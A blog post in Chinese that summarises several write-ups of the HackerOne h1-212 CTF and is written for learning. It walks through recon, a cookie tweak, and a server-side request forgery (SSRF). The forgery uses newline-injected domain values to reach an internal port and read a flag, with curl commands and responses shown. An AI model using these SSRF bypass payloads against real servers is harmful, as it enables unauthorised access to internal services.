Jason Sheh

Learn From h1-212 CTF Writeup


Introduction
最近,在推特上看到了Hacker One举行的一个小CTF,很有意思,虽然我没有来得及在规定的时间去做一下当然,我也做不出来,对,我就是不太会CTF,看了很多个write-up每个人都有不同的思路,从各自不同的方法中自觉学到了不少东西

The h1-212 CTF

An engineer of acme.org launched a new server for a new admin panel at http://104.236.20.43/. He is completely confident that the server can’t be hacked. He added a tripwire that notifies him when the flag file is read. He also noticed that the default Apache page is still there, but according to him that’s intentional and doesn’t hurt anyone. Your goal? Read the flag!

关键点:acme.org admin-panel 104.236.20.43

首先访问104.236.20.43,印入眼帘的是apache的默认页面,我看到大部分writeup里第一步都是信息收集:
扫ip

Nmap scan report for 104.236.20.43
Host is up (0.058s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
扫目录
http://104.236.20.43/index.html
http://104.236.20.43/icons/README
http://104.236.20.43/flag

根据acme.org的提示,很多人用了scan.rb查找某个ip绑定的虚拟主机,也有直接在hosts文件里写入

$ echo "104.236.20.43   admin.acme.org" >> /etc/hosts

也有用curl加入请求头的

curl -H 'Host: admin.acme.org' 'http://104.236.20.43/'
curl -I admin.acme.org
HTTP/1.1 200 OK
Date: Thu, 16 Nov 2017 12:05:51 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: admin=no
Content-Type: text/html; charset=UTF-8

很明显是让我们去把cookie中的admin改为yes

curl admin.acme.org -b 'admin=yes'
HTTP/1.1 405 Method Not Allowed
Date: Thu, 16 Nov 2017 12:09:15 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Type: text/html; charset=UTF-8

405 Method Not Allowed,把请求方法改为POST

curl -X POST -I -b 'admin=yes' 'admin.acme.org'
HTTP/1.1 406 Not Acceptable
Date: Thu, 16 Nov 2017 12:16:09 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8

是什么406错误呢,请求的格式不符合服务端要求的,这里需要尝试所有的可能,最后结果是application/json

curl -X POST -H ‘Content-Type: application/json’ -b ‘admin=yes’ -d ‘{"random" : "data"}’ ‘admin.acme.org’
{"error":{"domain":"required"}}

curl -X POST -H ‘Content-Type: application/json’ -b ‘admin=yes’ -d ‘{"domain" : "admin.acme.org"}’ ‘admin.acme.org’
{"error":{"domain":"incorrect value, .com domain expected"}}

curl -X POST -H ‘Content-Type: application/json’ -b ‘admin=yes’ -d ‘{"domain" : "213.acme.com"}’ ‘admin.acme.org’
{"error":{"domain":"incorrect value, sub domain should contain 212"}}

curl -X POST -H ‘Content-Type: application/json’ -b ‘admin=yes’ -d ‘{"domain" : "213.acme.com"}’ ‘admin.acme.org’
{“next":"\/read.php?id=0"}

curl -b ‘admin=yes’ ‘http://admin.acme.org/read.php?id=0‘
{"data":""}

到了这步很多人的反应是查看是否存在sqli,这个思路是正确的,不过在这里不存在,这时候很多人想到了提供一个网址可能会返回信息是否存在ssrf,域名的限制是212.*.com,找一个这样的网站测试一下。

curl -X POST -H ‘Content-Type: application/json’ -b ‘admin=yes’ -d ‘{"domain" : "212.tomnomnom.com"}’ ‘admin.acme.org’
{"next":"\/read.php?id=2"}

curl -s -H’Host: admin.acme.org’ -H’Cookie: admin=yes’ http://104.236.20.43/read.php?id=2
{"data":"OikK"}

确认确实存在ssrf,思考如何绕过限制访问内网

通过内网域名
212.0000003.com:80/.com

使用\n进行多次请求
212.test.com\n127.0.0.1:22\n1234.com

之后对内网端口扫描一下,发现开放了1337,flag就存放在127.0.0.1:1337\flag下

总结
幸好之前及时复现了一下,在写这篇文章时已经无法访问了
通过这次CTF的学习,看到了大家的各种思路,也对ssrf稍微有了点了解,希望有机会自己也能参与其中。